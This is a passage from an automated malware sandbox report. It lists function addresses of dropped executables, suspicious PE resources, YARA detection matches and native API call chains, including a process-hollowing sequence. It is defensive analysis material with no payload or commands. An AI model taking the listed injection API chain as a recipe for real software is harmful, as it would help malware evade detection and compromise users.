Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27EBB0 23_2_6D27EBB0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2EEB8A 23_2_6D2EEB8A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D298BE8 23_2_6D298BE8
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F23E3 23_2_6D2F23E3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27ABD8 23_2_6D27ABD8
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FFA2B 23_2_6D2FFA2B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3132A9 23_2_6D3132A9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30E2C5 23_2_6D30E2C5
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03029390 24_2_03029390
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03021280 24_2_03021280
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03020520 24_2_03020520
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03023590 24_2_03023590
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_0302DA80 24_2_0302DA80
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03029F88 24_2_03029F88
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03023D08 24_2_03023D08
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03028DA0 24_2_03028DA0
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03020DD0 24_2_03020DD0
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03029380 24_2_03029380
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_0302126F 24_2_0302126F
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03020510 24_2_03020510
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_0302DA47 24_2_0302DA47
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03028D90 24_2_03028D90
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_03020DC0 24_2_03020DC0
Source: C:\Users\user\AppData\Local\Temp\610B.exe Code function: 27_2_0232EFE8 27_2_0232EFE8
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0109B950 29_2_0109B950
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0109E260 29_2_0109E260
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0109E9E9 29_2_0109E9E9
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_02BFAAD8 29_2_02BFAAD8
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_02BF5B20 29_2_02BF5B20
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_02BF3870 29_2_02BF3870
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_02BF6EE0 29_2_02BF6EE0
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_02BFF0B5 29_2_02BFF0B5
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_02BF8518 29_2_02BF8518
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_02BFEF88 29_2_02BFEF88
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_02BFEF78 29_2_02BFEF78
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0538A7D8 29_2_0538A7D8
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_05389048 29_2_05389048
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_053883D0 29_2_053883D0
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0538BE70 29_2_0538BE70
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0538CB10 29_2_0538CB10
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0538D26B 29_2_0538D26B
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0538DED8 29_2_0538DED8
PE file contains strange resources
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 59B4.exe.5.dr Static PE information: Resource name: RT_ACCELERATOR type: Android binary XML
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9D57.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: argjvbv.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.24.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.24.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Uses 32bit PE files
Source: y4oMrtO1Mt.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 24.2.B8B0.exe.ce0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B8B0.exe.ce0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B8B0.exe.ce0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B8B0.exe.ce0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B8B0.exe.ce0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000001D.00000002.945154520.0000000003D11000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: 82DC.exe PID: 4904, type: MEMORYSTR Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: String function: 6D2D5720 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: String function: 6D24B150 appears 129 times
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: String function: 6D29D08C appears 41 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_00401813 Sleep,NtTerminateProcess, 1_2_00401813
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_00401842 Sleep,NtTerminateProcess, 1_2_00401842
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 1_2_00402052
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_00402403 NtEnumerateKey,NtEnumerateKey, 1_2_00402403
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_00401812 Sleep,NtTerminateProcess, 1_2_00401812
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 1_2_0040202C
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_00401830 Sleep,NtTerminateProcess, 1_2_00401830
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_00401833 Sleep,NtTerminateProcess, 1_2_00401833
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_00401836 Sleep,NtTerminateProcess, 1_2_00401836
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_004023D9 NtEnumerateKey, 1_2_004023D9
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_1_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 1_1_00402052
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_1_004023D9 NtEnumerateKey, 1_1_004023D9
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_1_00402403 NtEnumerateKey,NtEnumerateKey, 1_1_00402403
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_1_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 1_1_0040202C
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 10_2_02BD0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 10_2_02BD0110
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_00401813 Sleep,NtTerminateProcess, 11_2_00401813
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_00401842 Sleep,NtTerminateProcess, 11_2_00401842
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 11_2_00402052
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_00402403 NtEnumerateKey,NtEnumerateKey, 11_2_00402403
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_00401812 Sleep,NtTerminateProcess, 11_2_00401812
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 11_2_0040202C
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_00401830 Sleep,NtTerminateProcess, 11_2_00401830
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_00401833 Sleep,NtTerminateProcess, 11_2_00401833
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_00401836 Sleep,NtTerminateProcess, 11_2_00401836
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_004023D9 NtEnumerateKey, 11_2_004023D9
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_00401813 Sleep,NtTerminateProcess, 13_2_00401813
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_00401842 Sleep,NtTerminateProcess, 13_2_00401842
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 13_2_00402052
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_00402403 NtEnumerateKey,NtEnumerateKey, 13_2_00402403
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_00401812 Sleep,NtTerminateProcess, 13_2_00401812
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 13_2_0040202C
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_00401830 Sleep,NtTerminateProcess, 13_2_00401830
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_00401833 Sleep,NtTerminateProcess, 13_2_00401833
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_00401836 Sleep,NtTerminateProcess, 13_2_00401836
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_004023D9 NtEnumerateKey, 13_2_004023D9
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_1_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 13_1_00402052
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_1_004023D9 NtEnumerateKey, 13_1_004023D9
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_1_00402403 NtEnumerateKey,NtEnumerateKey, 13_1_00402403
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_1_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 13_1_0040202C
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289780 ZwMapViewOfSection,LdrInitializeThunk, 23_2_6D289780
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289600 ZwOpenKey,LdrInitializeThunk, 23_2_6D289600
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289660 ZwAllocateVirtualMemory,LdrInitializeThunk, 23_2_6D289660
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2899A0 ZwCreateSection,LdrInitializeThunk, 23_2_6D2899A0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289820 ZwEnumerateKey,LdrInitializeThunk, 23_2_6D289820
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289860 ZwQuerySystemInformation,LdrInitializeThunk, 23_2_6D289860
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2898C0 ZwDuplicateObject,LdrInitializeThunk, 23_2_6D2898C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271520 RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D271520
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289520 ZwWaitForSingleObject, 23_2_6D289520
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FFD22 ZwQueryInformationProcess,RtlUniform, 23_2_6D2FFD22
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 23_2_6D274D3B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1D0B ZwSetInformationProcess, 23_2_6D2D1D0B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AD10 ZwSetCachedSigningLevel, 23_2_6D28AD10
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1D6A ZwWaitForMultipleObjects, 23_2_6D2D1D6A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D306D61 ZwAllocateVirtualMemoryEx, 23_2_6D306D61
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289D70 ZwAlpcQueryInformation, 23_2_6D289D70
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 23_2_6D2D1570
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D311D55 ZwFreeVirtualMemory, 23_2_6D311D55
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C3540 LdrAppxHandleIntegrityFailure,RtlQueryPackageIdentityEx,memset,ZwQueryValueKey,RtlFreeHeap,ZwClose,memset,memset,RtlCaptureContext,RtlReportException,ZwTerminateProcess, 23_2_6D2C3540
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1D43 ZwQueryInformationThread, 23_2_6D2D1D43
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D270548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 23_2_6D270548
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2465A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 23_2_6D2465A0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289DA0 ZwAlpcSendWaitReceivePort, 23_2_6D289DA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2895B0 ZwSetInformationThread, 23_2_6D2895B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289DB0 ZwAlpcSetInformation, 23_2_6D289DB0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 23_2_6D25DD80
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D30B581
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D301582 ZwTraceEvent, 23_2_6D301582
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D243591 ZwSetInformationFile, 23_2_6D243591
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289DE0 ZwAssociateWaitCompletionPacket, 23_2_6D289DE0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FEDE6 memset,memset,memset,ZwQueryInstallUILanguage,ZwIsUILanguageComitted,RtlLCIDToCultureName,ZwQueryValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings,RtlInitUnicodeString,ZwQueryValueKey,ZwEnumerateValueKey,RtlCompareUnicodeStrings,RtlCompareUnicodeStrings, 23_2_6D2FEDE6
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2495F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId, 23_2_6D2495F0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 23_2_6D2FBDFA
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2895F0 ZwQueryInformationFile, 23_2_6D2895F0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26EDC4 ZwCancelWaitCompletionPacket, 23_2_6D26EDC4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D244DC0 RtlpUnWaitCriticalSection,RtlRaiseStatus,TpWaitForAlpcCompletion,ZwSetEvent,ZwAlpcQueryInformation, 23_2_6D244DC0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2895C0 ZwSetEvent, 23_2_6D2895C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2445D0 RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 23_2_6D2445D0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2895D0 ZwClose, 23_2_6D2895D0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D2FFDD3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose, 23_2_6D24E420
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A420 ZwGetNlsSectionPtr, 23_2_6D28A420
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26FC39 ZwAssociateWaitCompletionPacket, 23_2_6D26FC39
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D301411 ZwTraceEvent, 23_2_6D301411
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318C14
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D280413 ZwUnmapViewOfSection, 23_2_6D280413
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318C75
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 23_2_6D26746D
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 23_2_6D2F3C60
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289C70 ZwAlpcConnectPort, 23_2_6D289C70
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D285C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 23_2_6D285C70
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1C76 ZwQueryInformationProcess, 23_2_6D2D1C76
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 23_2_6D27AC7B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1C49 ZwQueryInformationProcess, 23_2_6D2D1C49
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289C40 ZwAllocateVirtualMemoryEx, 23_2_6D289C40
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245450 RtlClearThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread, 23_2_6D245450
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2DC450 RtlReleasePrivilege,ZwAdjustPrivilegesToken,ZwSetInformationThread,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap, 23_2_6D2DC450
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24DCA4 ZwIsUILanguageComitted,ZwQueryInstallUILanguage,RtlpMuiRegFreeRegistryInfo,RtlInitUnicodeString,ZwOpenKey,ZwEnumerateKey,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,RtlpMuiRegFreeRegistryInfo, 23_2_6D24DCA4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D319CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D319CB3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D280CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 23_2_6D280CA1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D314CAB ZwTraceControl, 23_2_6D314CAB
